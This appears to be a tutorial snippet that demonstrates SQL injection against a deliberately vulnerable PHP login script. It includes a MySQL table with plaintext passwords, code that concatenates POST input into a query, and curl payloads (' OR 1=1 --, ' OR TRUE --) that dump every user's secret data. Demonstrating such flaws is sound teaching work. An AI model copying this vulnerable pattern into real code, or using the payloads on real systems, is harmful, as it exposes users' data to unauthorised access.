Given the following table structure
CREATE TABLE `clients` (
`id` int(11) unsigned NOT NULL AUTO_INCREMENT,
`email` varchar(100) NOT NULL,
`password` varbinary(100) NOT NULL,
`secretData` varchar(20) DEFAULT NULL,
PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=latin1
With the following data in it
INSERT INTO `clients` (`email`,`password`)
VALUES
("bob@gmail.com","aadsf345"), ("mark@aol.com","536734sdgf"),
("mary@outlook.com","password123"), ("anna@mail.ru","{}!@#$>,ZX");
And your vulnerable php code that would select an user based on his/hers email and password combination and display the string in the secretData
column
$db = new mysqli("localhost", "root", "", "test");
$email = $_POST['email'];
$pass = $_POST['password'];
$sql = "SELECT * FROM clients WHERE email = '$email' AND password = '$pass'";
if ($result = $db->query($sql)) {
while($obj = $result->fetch_object()){
print $obj->secretData . PHP_EOL;
}
}
else{
print "no result";
}
A successful login would be as follows, displaying bob's secret data
$ curl -d 'email=bob@gmail.com&password=aadsf345' http://localhost.com
aaaaa
While a successful injection would be as follows, display everybody's secret data
$ curl -d 'email=bob@gmail.com&password=aads%27+OR+1=1+--+' http://localhost.com
aaaaa
bbbbb
ccccc
ddddd
If you were to print out the injected query, our injection starts at the marker, with the %27
which is a single quote.
SELECT * FROM clients WHERE email = 'bob@gmail.com' AND password = 'aads' OR 1=1 -- '
^
Using OR TRUE
works as well
curl -d 'email=bob@gmail.com&password=aads%27+OR+TRUE+--+' http://localhost.com